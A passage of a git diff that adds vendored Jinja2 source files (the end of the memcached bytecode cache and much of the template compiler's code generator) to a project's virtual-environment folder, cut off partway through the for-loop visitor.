The minimal interface for the client passed to the constructor is this: + + .. class:: MinimalClientInterface + + .. method:: set(key, value[, timeout]) + + Stores the bytecode in the cache. `value` is a string and + `timeout` the timeout of the key. If timeout is not provided + a default timeout or no timeout should be assumed, if it's + provided it's an integer with the number of seconds the cache + item should exist. + + .. method:: get(key) + + Returns the value for the cache key. If the item does not + exist in the cache the return value must be `None`. + + The other arguments to the constructor are the prefix for all keys that + is added before the actual cache key and the timeout for the bytecode in + the cache system. We recommend a high (or no) timeout. + + This bytecode cache does not support clearing of used items in the cache. + The clear method is a no-operation function. + + .. versionadded:: 2.7 + Added support for ignoring memcache errors through the + `ignore_memcache_errors` parameter. + """ + + def __init__( + self, + client: "_MemcachedClient", + prefix: str = "jinja2/bytecode/", + timeout: t.Optional[int] = None, + ignore_memcache_errors: bool = True, + ): + self.client = client + self.prefix = prefix + self.timeout = timeout + self.ignore_memcache_errors = ignore_memcache_errors + + def load_bytecode(self, bucket: Bucket) -> None: + try: + code = self.client.get(self.prefix + bucket.key) + except Exception: + if not self.ignore_memcache_errors: + raise + else: + bucket.bytecode_from_string(code) + + def dump_bytecode(self, bucket: Bucket) -> None: + key = self.prefix + bucket.key + value = bucket.bytecode_to_string() + + try: + if self.timeout is not None: + self.client.set(key, value, self.timeout) + else: + self.client.set(key, value) + except Exception: + if not self.ignore_memcache_errors: + raise diff --git a/env/Lib/site-packages/jinja2/compiler.py b/env/Lib/site-packages/jinja2/compiler.py new file mode 100644 index 00000000..3458095f --- /dev/null +++ b/env/Lib/site-packages/jinja2/compiler.py @@ -0,0 +1,1957 @@ +"""Compiles nodes from the parser into Python code.""" +import typing as t +from contextlib import contextmanager +from functools import update_wrapper +from io import StringIO +from itertools import chain +from keyword import iskeyword as is_python_keyword + +from markupsafe import escape +from markupsafe import Markup + +from . import nodes +from .exceptions import TemplateAssertionError +from .idtracking import Symbols +from .idtracking import VAR_LOAD_ALIAS +from .idtracking import VAR_LOAD_PARAMETER +from .idtracking import VAR_LOAD_RESOLVE +from .idtracking import VAR_LOAD_UNDEFINED +from .nodes import EvalContext +from .optimizer import Optimizer +from .utils import _PassArg +from .utils import concat +from .visitor import NodeVisitor + +if t.TYPE_CHECKING: + import typing_extensions as te + from .environment import Environment + +F = t.TypeVar("F", bound=t.Callable[..., t.Any]) + +operators = { + "eq": "==", + "ne": "!=", + "gt": ">", + "gteq": ">=", + "lt": "<", + "lteq": "<=", + "in": "in", + "notin": "not in", +} + + +def optimizeconst(f: F) -> F: + def new_func( + self: "CodeGenerator", node: nodes.Expr, frame: "Frame", **kwargs: t.Any + ) -> t.Any: + # Only optimize if the frame is not volatile + if self.optimizer is not None and not frame.eval_ctx.volatile: + new_node = self.optimizer.visit(node, frame.eval_ctx) + + if new_node != node: + return self.visit(new_node, frame) + + return f(self, node, frame, **kwargs) + + return update_wrapper(t.cast(F, new_func), f) + + +def _make_binop(op: str) -> t.Callable[["CodeGenerator", nodes.BinExpr, "Frame"], None]: + @optimizeconst + def visitor(self: "CodeGenerator", node: nodes.BinExpr, frame: Frame) -> None: + if ( + self.environment.sandboxed + and op in self.environment.intercepted_binops # type: ignore + ): + self.write(f"environment.call_binop(context, {op!r}, ") + self.visit(node.left, frame) + self.write(", ") + self.visit(node.right, frame) + else: + self.write("(") + self.visit(node.left, frame) + self.write(f" {op} ") + self.visit(node.right, frame) + + self.write(")") + + return visitor + + +def _make_unop( + op: str, +) -> t.Callable[["CodeGenerator", nodes.UnaryExpr, "Frame"], None]: + @optimizeconst + def visitor(self: "CodeGenerator", node: nodes.UnaryExpr, frame: Frame) -> None: + if ( + self.environment.sandboxed + and op in self.environment.intercepted_unops # type: ignore + ): + self.write(f"environment.call_unop(context, {op!r}, ") + self.visit(node.node, frame) + else: + self.write("(" + op) + self.visit(node.node, frame) + + self.write(")") + + return visitor + + +def generate( + node: nodes.Template, + environment: "Environment", + name: t.Optional[str], + filename: t.Optional[str], + stream: t.Optional[t.TextIO] = None, + defer_init: bool = False, + optimized: bool = True, +) -> t.Optional[str]: + """Generate the python source for a node tree.""" + if not isinstance(node, nodes.Template): + raise TypeError("Can't compile non template nodes") + + generator = environment.code_generator_class( + environment, name, filename, stream, defer_init, optimized + ) + generator.visit(node) + + if stream is None: + return generator.stream.getvalue() # type: ignore + + return None + + +def has_safe_repr(value: t.Any) -> bool: + """Does the node have a safe representation?""" + if value is None or value is NotImplemented or value is Ellipsis: + return True + + if type(value) in {bool, int, float, complex, range, str, Markup}: + return True + + if type(value) in {tuple, list, set, frozenset}: + return all(has_safe_repr(v) for v in value) + + if type(value) is dict: + return all(has_safe_repr(k) and has_safe_repr(v) for k, v in value.items()) + + return False + + +def find_undeclared( + nodes: t.Iterable[nodes.Node], names: t.Iterable[str] +) -> t.Set[str]: + """Check if the names passed are accessed undeclared. The return value + is a set of all the undeclared names from the sequence of names found. + """ + visitor = UndeclaredNameVisitor(names) + try: + for node in nodes: + visitor.visit(node) + except VisitorExit: + pass + return visitor.undeclared + + +class MacroRef: + def __init__(self, node: t.Union[nodes.Macro, nodes.CallBlock]) -> None: + self.node = node + self.accesses_caller = False + self.accesses_kwargs = False + self.accesses_varargs = False + + +class Frame: + """Holds compile time information for us.""" + + def __init__( + self, + eval_ctx: EvalContext, + parent: t.Optional["Frame"] = None, + level: t.Optional[int] = None, + ) -> None: + self.eval_ctx = eval_ctx + + # the parent of this frame + self.parent = parent + + if parent is None: + self.symbols = Symbols(level=level) + + # in some dynamic inheritance situations the compiler needs to add + # write tests around output statements. + self.require_output_check = False + + # inside some tags we are using a buffer rather than yield statements. + # this for example affects {% filter %} or {% macro %}. If a frame + # is buffered this variable points to the name of the list used as + # buffer. + self.buffer: t.Optional[str] = None + + # the name of the block we're in, otherwise None. + self.block: t.Optional[str] = None + + else: + self.symbols = Symbols(parent.symbols, level=level) + self.require_output_check = parent.require_output_check + self.buffer = parent.buffer + self.block = parent.block + + # a toplevel frame is the root + soft frames such as if conditions. + self.toplevel = False + + # the root frame is basically just the outermost frame, so no if + # conditions. This information is used to optimize inheritance + # situations. + self.rootlevel = False + + # variables set inside of loops and blocks should not affect outer frames, + # but they still needs to be kept track of as part of the active context. + self.loop_frame = False + self.block_frame = False + + # track whether the frame is being used in an if-statement or conditional + # expression as it determines which errors should be raised during runtime + # or compile time. + self.soft_frame = False + + def copy(self) -> "Frame": + """Create a copy of the current one.""" + rv = object.__new__(self.__class__) + rv.__dict__.update(self.__dict__) + rv.symbols = self.symbols.copy() + return rv + + def inner(self, isolated: bool = False) -> "Frame": + """Return an inner frame.""" + if isolated: + return Frame(self.eval_ctx, level=self.symbols.level + 1) + return Frame(self.eval_ctx, self) + + def soft(self) -> "Frame": + """Return a soft frame. A soft frame may not be modified as + standalone thing as it shares the resources with the frame it + was created of, but it's not a rootlevel frame any longer. + + This is only used to implement if-statements and conditional + expressions. + """ + rv = self.copy() + rv.rootlevel = False + rv.soft_frame = True + return rv + + __copy__ = copy + + +class VisitorExit(RuntimeError): + """Exception used by the `UndeclaredNameVisitor` to signal a stop.""" + + +class DependencyFinderVisitor(NodeVisitor): + """A visitor that collects filter and test calls.""" + + def __init__(self) -> None: + self.filters: t.Set[str] = set() + self.tests: t.Set[str] = set() + + def visit_Filter(self, node: nodes.Filter) -> None: + self.generic_visit(node) + self.filters.add(node.name) + + def visit_Test(self, node: nodes.Test) -> None: + self.generic_visit(node) + self.tests.add(node.name) + + def visit_Block(self, node: nodes.Block) -> None: + """Stop visiting at blocks.""" + + +class UndeclaredNameVisitor(NodeVisitor): + """A visitor that checks if a name is accessed without being + declared. This is different from the frame visitor as it will + not stop at closure frames. + """ + + def __init__(self, names: t.Iterable[str]) -> None: + self.names = set(names) + self.undeclared: t.Set[str] = set() + + def visit_Name(self, node: nodes.Name) -> None: + if node.ctx == "load" and node.name in self.names: + self.undeclared.add(node.name) + if self.undeclared == self.names: + raise VisitorExit() + else: + self.names.discard(node.name) + + def visit_Block(self, node: nodes.Block) -> None: + """Stop visiting a blocks.""" + + +class CompilerExit(Exception): + """Raised if the compiler encountered a situation where it just + doesn't make sense to further process the code. Any block that + raises such an exception is not further processed. + """ + + +class CodeGenerator(NodeVisitor): + def __init__( + self, + environment: "Environment", + name: t.Optional[str], + filename: t.Optional[str], + stream: t.Optional[t.TextIO] = None, + defer_init: bool = False, + optimized: bool = True, + ) -> None: + if stream is None: + stream = StringIO() + self.environment = environment + self.name = name + self.filename = filename + self.stream = stream + self.created_block_context = False + self.defer_init = defer_init + self.optimizer: t.Optional[Optimizer] = None + + if optimized: + self.optimizer = Optimizer(environment) + + # aliases for imports + self.import_aliases: t.Dict[str, str] = {} + + # a registry for all blocks. Because blocks are moved out + # into the global python scope they are registered here + self.blocks: t.Dict[str, nodes.Block] = {} + + # the number of extends statements so far + self.extends_so_far = 0 + + # some templates have a rootlevel extends. In this case we + # can safely assume that we're a child template and do some + # more optimizations. + self.has_known_extends = False + + # the current line number + self.code_lineno = 1 + + # registry of all filters and tests (global, not block local) + self.tests: t.Dict[str, str] = {} + self.filters: t.Dict[str, str] = {} + + # the debug information + self.debug_info: t.List[t.Tuple[int, int]] = [] + self._write_debug_info: t.Optional[int] = None + + # the number of new lines before the next write() + self._new_lines = 0 + + # the line number of the last written statement + self._last_line = 0 + + # true if nothing was written so far. + self._first_write = True + + # used by the `temporary_identifier` method to get new + # unique, temporary identifier + self._last_identifier = 0 + + # the current indentation + self._indentation = 0 + + # Tracks toplevel assignments + self._assign_stack: t.List[t.Set[str]] = [] + + # Tracks parameter definition blocks + self._param_def_block: t.List[t.Set[str]] = [] + + # Tracks the current context. + self._context_reference_stack = ["context"] + + @property + def optimized(self) -> bool: + return self.optimizer is not None + + # -- Various compilation helpers + + def fail(self, msg: str, lineno: int) -> "te.NoReturn": + """Fail with a :exc:`TemplateAssertionError`.""" + raise TemplateAssertionError(msg, lineno, self.name, self.filename) + + def temporary_identifier(self) -> str: + """Get a new unique identifier.""" + self._last_identifier += 1 + return f"t_{self._last_identifier}" + + def buffer(self, frame: Frame) -> None: + """Enable buffering for the frame from that point onwards.""" + frame.buffer = self.temporary_identifier() + self.writeline(f"{frame.buffer} = []") + + def return_buffer_contents( + self, frame: Frame, force_unescaped: bool = False + ) -> None: + """Return the buffer contents of the frame.""" + if not force_unescaped: + if frame.eval_ctx.volatile: + self.writeline("if context.eval_ctx.autoescape:") + self.indent() + self.writeline(f"return Markup(concat({frame.buffer}))") + self.outdent() + self.writeline("else:") + self.indent() + self.writeline(f"return concat({frame.buffer})") + self.outdent() + return + elif frame.eval_ctx.autoescape: + self.writeline(f"return Markup(concat({frame.buffer}))") + return + self.writeline(f"return concat({frame.buffer})") + + def indent(self) -> None: + """Indent by one.""" + self._indentation += 1 + + def outdent(self, step: int = 1) -> None: + """Outdent by step.""" + self._indentation -= step + + def start_write(self, frame: Frame, node: t.Optional[nodes.Node] = None) -> None: + """Yield or write into the frame buffer.""" + if frame.buffer is None: + self.writeline("yield ", node) + else: + self.writeline(f"{frame.buffer}.append(", node) + + def end_write(self, frame: Frame) -> None: + """End the writing process started by `start_write`.""" + if frame.buffer is not None: + self.write(")") + + def simple_write( + self, s: str, frame: Frame, node: t.Optional[nodes.Node] = None + ) -> None: + """Simple shortcut for start_write + write + end_write.""" + self.start_write(frame, node) + self.write(s) + self.end_write(frame) + + def blockvisit(self, nodes: t.Iterable[nodes.Node], frame: Frame) -> None: + """Visit a list of nodes as block in a frame. If the current frame + is no buffer a dummy ``if 0: yield None`` is written automatically. + """ + try: + self.writeline("pass") + for node in nodes: + self.visit(node, frame) + except CompilerExit: + pass + + def write(self, x: str) -> None: + """Write a string into the output stream.""" + if self._new_lines: + if not self._first_write: + self.stream.write("\n" * self._new_lines) + self.code_lineno += self._new_lines + if self._write_debug_info is not None: + self.debug_info.append((self._write_debug_info, self.code_lineno)) + self._write_debug_info = None + self._first_write = False + self.stream.write(" " * self._indentation) + self._new_lines = 0 + self.stream.write(x) + + def writeline( + self, x: str, node: t.Optional[nodes.Node] = None, extra: int = 0 + ) -> None: + """Combination of newline and write.""" + self.newline(node, extra) + self.write(x) + + def newline(self, node: t.Optional[nodes.Node] = None, extra: int = 0) -> None: + """Add one or more newlines before the next write.""" + self._new_lines = max(self._new_lines, 1 + extra) + if node is not None and node.lineno != self._last_line: + self._write_debug_info = node.lineno + self._last_line = node.lineno + + def signature( + self, + node: t.Union[nodes.Call, nodes.Filter, nodes.Test], + frame: Frame, + extra_kwargs: t.Optional[t.Mapping[str, t.Any]] = None, + ) -> None: + """Writes a function call to the stream for the current node. + A leading comma is added automatically. The extra keyword + arguments may not include python keywords otherwise a syntax + error could occur. The extra keyword arguments should be given + as python dict. + """ + # if any of the given keyword arguments is a python keyword + # we have to make sure that no invalid call is created. + kwarg_workaround = any( + is_python_keyword(t.cast(str, k)) + for k in chain((x.key for x in node.kwargs), extra_kwargs or ()) + ) + + for arg in node.args: + self.write(", ") + self.visit(arg, frame) + + if not kwarg_workaround: + for kwarg in node.kwargs: + self.write(", ") + self.visit(kwarg, frame) + if extra_kwargs is not None: + for key, value in extra_kwargs.items(): + self.write(f", {key}={value}") + if node.dyn_args: + self.write(", *") + self.visit(node.dyn_args, frame) + + if kwarg_workaround: + if node.dyn_kwargs is not None: + self.write(", **dict({") + else: + self.write(", **{") + for kwarg in node.kwargs: + self.write(f"{kwarg.key!r}: ") + self.visit(kwarg.value, frame) + self.write(", ") + if extra_kwargs is not None: + for key, value in extra_kwargs.items(): + self.write(f"{key!r}: {value}, ") + if node.dyn_kwargs is not None: + self.write("}, **") + self.visit(node.dyn_kwargs, frame) + self.write(")") + else: + self.write("}") + + elif node.dyn_kwargs is not None: + self.write(", **") + self.visit(node.dyn_kwargs, frame) + + def pull_dependencies(self, nodes: t.Iterable[nodes.Node]) -> None: + """Find all filter and test names used in the template and + assign them to variables in the compiled namespace. Checking + that the names are registered with the environment is done when + compiling the Filter and Test nodes. If the node is in an If or + CondExpr node, the check is done at runtime instead. + + .. versionchanged:: 3.0 + Filters and tests in If and CondExpr nodes are checked at + runtime instead of compile time. + """ + visitor = DependencyFinderVisitor() + + for node in nodes: + visitor.visit(node) + + for id_map, names, dependency in (self.filters, visitor.filters, "filters"), ( + self.tests, + visitor.tests, + "tests", + ): + for name in sorted(names): + if name not in id_map: + id_map[name] = self.temporary_identifier() + + # add check during runtime that dependencies used inside of executed + # blocks are defined, as this step may be skipped during compile time + self.writeline("try:") + self.indent() + self.writeline(f"{id_map[name]} = environment.{dependency}[{name!r}]") + self.outdent() + self.writeline("except KeyError:") + self.indent() + self.writeline("@internalcode") + self.writeline(f"def {id_map[name]}(*unused):") + self.indent() + self.writeline( + f'raise TemplateRuntimeError("No {dependency[:-1]}' + f' named {name!r} found.")' + ) + self.outdent() + self.outdent() + + def enter_frame(self, frame: Frame) -> None: + undefs = [] + for target, (action, param) in frame.symbols.loads.items(): + if action == VAR_LOAD_PARAMETER: + pass + elif action == VAR_LOAD_RESOLVE: + self.writeline(f"{target} = {self.get_resolve_func()}({param!r})") + elif action == VAR_LOAD_ALIAS: + self.writeline(f"{target} = {param}") + elif action == VAR_LOAD_UNDEFINED: + undefs.append(target) + else: + raise NotImplementedError("unknown load instruction") + if undefs: + self.writeline(f"{' = '.join(undefs)} = missing") + + def leave_frame(self, frame: Frame, with_python_scope: bool = False) -> None: + if not with_python_scope: + undefs = [] + for target in frame.symbols.loads: + undefs.append(target) + if undefs: + self.writeline(f"{' = '.join(undefs)} = missing") + + def choose_async(self, async_value: str = "async ", sync_value: str = "") -> str: + return async_value if self.environment.is_async else sync_value + + def func(self, name: str) -> str: + return f"{self.choose_async()}def {name}" + + def macro_body( + self, node: t.Union[nodes.Macro, nodes.CallBlock], frame: Frame + ) -> t.Tuple[Frame, MacroRef]: + """Dump the function def of a macro or call block.""" + frame = frame.inner() + frame.symbols.analyze_node(node) + macro_ref = MacroRef(node) + + explicit_caller = None + skip_special_params = set() + args = [] + + for idx, arg in enumerate(node.args): + if arg.name == "caller": + explicit_caller = idx + if arg.name in ("kwargs", "varargs"): + skip_special_params.add(arg.name) + args.append(frame.symbols.ref(arg.name)) + + undeclared = find_undeclared(node.body, ("caller", "kwargs", "varargs")) + + if "caller" in undeclared: + # In older Jinja versions there was a bug that allowed caller + # to retain the special behavior even if it was mentioned in + # the argument list. However thankfully this was only really + # working if it was the last argument. So we are explicitly + # checking this now and error out if it is anywhere else in + # the argument list. + if explicit_caller is not None: + try: + node.defaults[explicit_caller - len(node.args)] + except IndexError: + self.fail( + "When defining macros or call blocks the " + 'special "caller" argument must be omitted ' + "or be given a default.", + node.lineno, + ) + else: + args.append(frame.symbols.declare_parameter("caller")) + macro_ref.accesses_caller = True + if "kwargs" in undeclared and "kwargs" not in skip_special_params: + args.append(frame.symbols.declare_parameter("kwargs")) + macro_ref.accesses_kwargs = True + if "varargs" in undeclared and "varargs" not in skip_special_params: + args.append(frame.symbols.declare_parameter("varargs")) + macro_ref.accesses_varargs = True + + # macros are delayed, they never require output checks + frame.require_output_check = False + frame.symbols.analyze_node(node) + self.writeline(f"{self.func('macro')}({', '.join(args)}):", node) + self.indent() + + self.buffer(frame) + self.enter_frame(frame) + + self.push_parameter_definitions(frame) + for idx, arg in enumerate(node.args): + ref = frame.symbols.ref(arg.name) + self.writeline(f"if {ref} is missing:") + self.indent() + try: + default = node.defaults[idx - len(node.args)] + except IndexError: + self.writeline( + f'{ref} = undefined("parameter {arg.name!r} was not provided",' + f" name={arg.name!r})" + ) + else: + self.writeline(f"{ref} = ") + self.visit(default, frame) + self.mark_parameter_stored(ref) + self.outdent() + self.pop_parameter_definitions() + + self.blockvisit(node.body, frame) + self.return_buffer_contents(frame, force_unescaped=True) + self.leave_frame(frame, with_python_scope=True) + self.outdent() + + return frame, macro_ref + + def macro_def(self, macro_ref: MacroRef, frame: Frame) -> None: + """Dump the macro definition for the def created by macro_body.""" + arg_tuple = ", ".join(repr(x.name) for x in macro_ref.node.args) + name = getattr(macro_ref.node, "name", None) + if len(macro_ref.node.args) == 1: + arg_tuple += "," + self.write( + f"Macro(environment, macro, {name!r}, ({arg_tuple})," + f" {macro_ref.accesses_kwargs!r}, {macro_ref.accesses_varargs!r}," + f" {macro_ref.accesses_caller!r}, context.eval_ctx.autoescape)" + ) + + def position(self, node: nodes.Node) -> str: + """Return a human readable position for the node.""" + rv = f"line {node.lineno}" + if self.name is not None: + rv = f"{rv} in {self.name!r}" + return rv + + def dump_local_context(self, frame: Frame) -> str: + items_kv = ", ".join( + f"{name!r}: {target}" + for name, target in frame.symbols.dump_stores().items() + ) + return f"{{{items_kv}}}" + + def write_commons(self) -> None: + """Writes a common preamble that is used by root and block functions. + Primarily this sets up common local helpers and enforces a generator + through a dead branch. + """ + self.writeline("resolve = context.resolve_or_missing") + self.writeline("undefined = environment.undefined") + self.writeline("concat = environment.concat") + # always use the standard Undefined class for the implicit else of + # conditional expressions + self.writeline("cond_expr_undefined = Undefined") + self.writeline("if 0: yield None") + + def push_parameter_definitions(self, frame: Frame) -> None: + """Pushes all parameter targets from the given frame into a local + stack that permits tracking of yet to be assigned parameters. In + particular this enables the optimization from `visit_Name` to skip + undefined expressions for parameters in macros as macros can reference + otherwise unbound parameters. + """ + self._param_def_block.append(frame.symbols.dump_param_targets()) + + def pop_parameter_definitions(self) -> None: + """Pops the current parameter definitions set.""" + self._param_def_block.pop() + + def mark_parameter_stored(self, target: str) -> None: + """Marks a parameter in the current parameter definitions as stored. + This will skip the enforced undefined checks. + """ + if self._param_def_block: + self._param_def_block[-1].discard(target) + + def push_context_reference(self, target: str) -> None: + self._context_reference_stack.append(target) + + def pop_context_reference(self) -> None: + self._context_reference_stack.pop() + + def get_context_ref(self) -> str: + return self._context_reference_stack[-1] + + def get_resolve_func(self) -> str: + target = self._context_reference_stack[-1] + if target == "context": + return "resolve" + return f"{target}.resolve" + + def derive_context(self, frame: Frame) -> str: + return f"{self.get_context_ref()}.derived({self.dump_local_context(frame)})" + + def parameter_is_undeclared(self, target: str) -> bool: + """Checks if a given target is an undeclared parameter.""" + if not self._param_def_block: + return False + return target in self._param_def_block[-1] + + def push_assign_tracking(self) -> None: + """Pushes a new layer for assignment tracking.""" + self._assign_stack.append(set()) + + def pop_assign_tracking(self, frame: Frame) -> None: + """Pops the topmost level for assignment tracking and updates the + context variables if necessary. + """ + vars = self._assign_stack.pop() + if ( + not frame.block_frame + and not frame.loop_frame + and not frame.toplevel + or not vars + ): + return + public_names = [x for x in vars if x[:1] != "_"] + if len(vars) == 1: + name = next(iter(vars)) + ref = frame.symbols.ref(name) + if frame.loop_frame: + self.writeline(f"_loop_vars[{name!r}] = {ref}") + return + if frame.block_frame: + self.writeline(f"_block_vars[{name!r}] = {ref}") + return + self.writeline(f"context.vars[{name!r}] = {ref}") + else: + if frame.loop_frame: + self.writeline("_loop_vars.update({") + elif frame.block_frame: + self.writeline("_block_vars.update({") + else: + self.writeline("context.vars.update({") + for idx, name in enumerate(vars): + if idx: + self.write(", ") + ref = frame.symbols.ref(name) + self.write(f"{name!r}: {ref}") + self.write("})") + if not frame.block_frame and not frame.loop_frame and public_names: + if len(public_names) == 1: + self.writeline(f"context.exported_vars.add({public_names[0]!r})") + else: + names_str = ", ".join(map(repr, public_names)) + self.writeline(f"context.exported_vars.update(({names_str}))") + + # -- Statement Visitors + + def visit_Template( + self, node: nodes.Template, frame: t.Optional[Frame] = None + ) -> None: + assert frame is None, "no root frame allowed" + eval_ctx = EvalContext(self.environment, self.name) + + from .runtime import exported, async_exported + + if self.environment.is_async: + exported_names = sorted(exported + async_exported) + else: + exported_names = sorted(exported) + + self.writeline("from jinja2.runtime import " + ", ".join(exported_names)) + + # if we want a deferred initialization we cannot move the + # environment into a local name + envenv = "" if self.defer_init else ", environment=environment" + + # do we have an extends tag at all? If not, we can save some + # overhead by just not processing any inheritance code. + have_extends = node.find(nodes.Extends) is not None + + # find all blocks + for block in node.find_all(nodes.Block): + if block.name in self.blocks: + self.fail(f"block {block.name!r} defined twice", block.lineno) + self.blocks[block.name] = block + + # find all imports and import them + for import_ in node.find_all(nodes.ImportedName): + if import_.importname not in self.import_aliases: + imp = import_.importname + self.import_aliases[imp] = alias = self.temporary_identifier() + if "." in imp: + module, obj = imp.rsplit(".", 1) + self.writeline(f"from {module} import {obj} as {alias}") + else: + self.writeline(f"import {imp} as {alias}") + + # add the load name + self.writeline(f"name = {self.name!r}") + + # generate the root render function. + self.writeline( + f"{self.func('root')}(context, missing=missing{envenv}):", extra=1 + ) + self.indent() + self.write_commons() + + # process the root + frame = Frame(eval_ctx) + if "self" in find_undeclared(node.body, ("self",)): + ref = frame.symbols.declare_parameter("self") + self.writeline(f"{ref} = TemplateReference(context)") + frame.symbols.analyze_node(node) + frame.toplevel = frame.rootlevel = True + frame.require_output_check = have_extends and not self.has_known_extends + if have_extends: + self.writeline("parent_template = None") + self.enter_frame(frame) + self.pull_dependencies(node.body) + self.blockvisit(node.body, frame) + self.leave_frame(frame, with_python_scope=True) + self.outdent() + + # make sure that the parent root is called. + if have_extends: + if not self.has_known_extends: + self.indent() + self.writeline("if parent_template is not None:") + self.indent() + if not self.environment.is_async: + self.writeline("yield from parent_template.root_render_func(context)") + else: + self.writeline( + "async for event in parent_template.root_render_func(context):" + ) + self.indent() + self.writeline("yield event") + self.outdent() + self.outdent(1 + (not self.has_known_extends)) + + # at this point we now have the blocks collected and can visit them too. + for name, block in self.blocks.items(): + self.writeline( + f"{self.func('block_' + name)}(context, missing=missing{envenv}):", + block, + 1, + ) + self.indent() + self.write_commons() + # It's important that we do not make this frame a child of the + # toplevel template. This would cause a variety of + # interesting issues with identifier tracking. + block_frame = Frame(eval_ctx) + block_frame.block_frame = True + undeclared = find_undeclared(block.body, ("self", "super")) + if "self" in undeclared: + ref = block_frame.symbols.declare_parameter("self") + self.writeline(f"{ref} = TemplateReference(context)") + if "super" in undeclared: + ref = block_frame.symbols.declare_parameter("super") + self.writeline(f"{ref} = context.super({name!r}, block_{name})") + block_frame.symbols.analyze_node(block) + block_frame.block = name + self.writeline("_block_vars = {}") + self.enter_frame(block_frame) + self.pull_dependencies(block.body) + self.blockvisit(block.body, block_frame) + self.leave_frame(block_frame, with_python_scope=True) + self.outdent() + + blocks_kv_str = ", ".join(f"{x!r}: block_{x}" for x in self.blocks) + self.writeline(f"blocks = {{{blocks_kv_str}}}", extra=1) + debug_kv_str = "&".join(f"{k}={v}" for k, v in self.debug_info) + self.writeline(f"debug_info = {debug_kv_str!r}") + + def visit_Block(self, node: nodes.Block, frame: Frame) -> None: + """Call a block and register it for the template.""" + level = 0 + if frame.toplevel: + # if we know that we are a child template, there is no need to + # check if we are one + if self.has_known_extends: + return + if self.extends_so_far > 0: + self.writeline("if parent_template is None:") + self.indent() + level += 1 + + if node.scoped: + context = self.derive_context(frame) + else: + context = self.get_context_ref() + + if node.required: + self.writeline(f"if len(context.blocks[{node.name!r}]) <= 1:", node) + self.indent() + self.writeline( + f'raise TemplateRuntimeError("Required block {node.name!r} not found")', + node, + ) + self.outdent() + + if not self.environment.is_async and frame.buffer is None: + self.writeline( + f"yield from context.blocks[{node.name!r}][0]({context})", node + ) + else: + self.writeline( + f"{self.choose_async()}for event in" + f" context.blocks[{node.name!r}][0]({context}):", + node, + ) + self.indent() + self.simple_write("event", frame) + self.outdent() + + self.outdent(level) + + def visit_Extends(self, node: nodes.Extends, frame: Frame) -> None: + """Calls the extender.""" + if not frame.toplevel: + self.fail("cannot use extend from a non top-level scope", node.lineno) + + # if the number of extends statements in general is zero so + # far, we don't have to add a check if something extended + # the template before this one. + if self.extends_so_far > 0: + + # if we have a known extends we just add a template runtime + # error into the generated code. We could catch that at compile + # time too, but i welcome it not to confuse users by throwing the + # same error at different times just "because we can". + if not self.has_known_extends: + self.writeline("if parent_template is not None:") + self.indent() + self.writeline('raise TemplateRuntimeError("extended multiple times")') + + # if we have a known extends already we don't need that code here + # as we know that the template execution will end here. + if self.has_known_extends: + raise CompilerExit() + else: + self.outdent() + + self.writeline("parent_template = environment.get_template(", node) + self.visit(node.template, frame) + self.write(f", {self.name!r})") + self.writeline("for name, parent_block in parent_template.blocks.items():") + self.indent() + self.writeline("context.blocks.setdefault(name, []).append(parent_block)") + self.outdent() + + # if this extends statement was in the root level we can take + # advantage of that information and simplify the generated code + # in the top level from this point onwards + if frame.rootlevel: + self.has_known_extends = True + + # and now we have one more + self.extends_so_far += 1 + + def visit_Include(self, node: nodes.Include, frame: Frame) -> None: + """Handles includes.""" + if node.ignore_missing: + self.writeline("try:") + self.indent() + + func_name = "get_or_select_template" + if isinstance(node.template, nodes.Const): + if isinstance(node.template.value, str): + func_name = "get_template" + elif isinstance(node.template.value, (tuple, list)): + func_name = "select_template" + elif isinstance(node.template, (nodes.Tuple, nodes.List)): + func_name = "select_template" + + self.writeline(f"template = environment.{func_name}(", node) + self.visit(node.template, frame) + self.write(f", {self.name!r})") + if node.ignore_missing: + self.outdent() + self.writeline("except TemplateNotFound:") + self.indent() + self.writeline("pass") + self.outdent() + self.writeline("else:") + self.indent() + + skip_event_yield = False + if node.with_context: + self.writeline( + f"{self.choose_async()}for event in template.root_render_func(" + "template.new_context(context.get_all(), True," + f" {self.dump_local_context(frame)})):" + ) + elif self.environment.is_async: + self.writeline( + "for event in (await template._get_default_module_async())" + "._body_stream:" + ) + else: + self.writeline("yield from template._get_default_module()._body_stream") + skip_event_yield = True + + if not skip_event_yield: + self.indent() + self.simple_write("event", frame) + self.outdent() + + if node.ignore_missing: + self.outdent() + + def _import_common( + self, node: t.Union[nodes.Import, nodes.FromImport], frame: Frame + ) -> None: + self.write(f"{self.choose_async('await ')}environment.get_template(") + self.visit(node.template, frame) + self.write(f", {self.name!r}).") + + if node.with_context: + f_name = f"make_module{self.choose_async('_async')}" + self.write( + f"{f_name}(context.get_all(), True, {self.dump_local_context(frame)})" + ) + else: + self.write(f"_get_default_module{self.choose_async('_async')}(context)") + + def visit_Import(self, node: nodes.Import, frame: Frame) -> None: + """Visit regular imports.""" + self.writeline(f"{frame.symbols.ref(node.target)} = ", node) + if frame.toplevel: + self.write(f"context.vars[{node.target!r}] = ") + + self._import_common(node, frame) + + if frame.toplevel and not node.target.startswith("_"): + self.writeline(f"context.exported_vars.discard({node.target!r})") + + def visit_FromImport(self, node: nodes.FromImport, frame: Frame) -> None: + """Visit named imports.""" + self.newline(node) + self.write("included_template = ") + self._import_common(node, frame) + var_names = [] + discarded_names = [] + for name in node.names: + if isinstance(name, tuple): + name, alias = name + else: + alias = name + self.writeline( + f"{frame.symbols.ref(alias)} =" + f" getattr(included_template, {name!r}, missing)" + ) + self.writeline(f"if {frame.symbols.ref(alias)} is missing:") + self.indent() + message = ( + "the template {included_template.__name__!r}" + f" (imported on {self.position(node)})" + f" does not export the requested name {name!r}" + ) + self.writeline( + f"{frame.symbols.ref(alias)} = undefined(f{message!r}, name={name!r})" + ) + self.outdent() + if frame.toplevel: + var_names.append(alias) + if not alias.startswith("_"): + discarded_names.append(alias) + + if var_names: + if len(var_names) == 1: + name = var_names[0] + self.writeline(f"context.vars[{name!r}] = {frame.symbols.ref(name)}") + else: + names_kv = ", ".join( + f"{name!r}: {frame.symbols.ref(name)}" for name in var_names + ) + self.writeline(f"context.vars.update({{{names_kv}}})") + if discarded_names: + if len(discarded_names) == 1: + self.writeline(f"context.exported_vars.discard({discarded_names[0]!r})") + else: + names_str = ", ".join(map(repr, discarded_names)) + self.writeline( + f"context.exported_vars.difference_update(({names_str}))" + ) + + def visit_For(self, node: nodes.For, frame: Frame) -> None: + loop_frame = frame.inner() + loop_frame.loop_frame = True + test_frame = frame.inner() + else_frame = frame.inner() + + # try to figure out if we have an extended loop. An extended loop + # is necessary if the loop is in 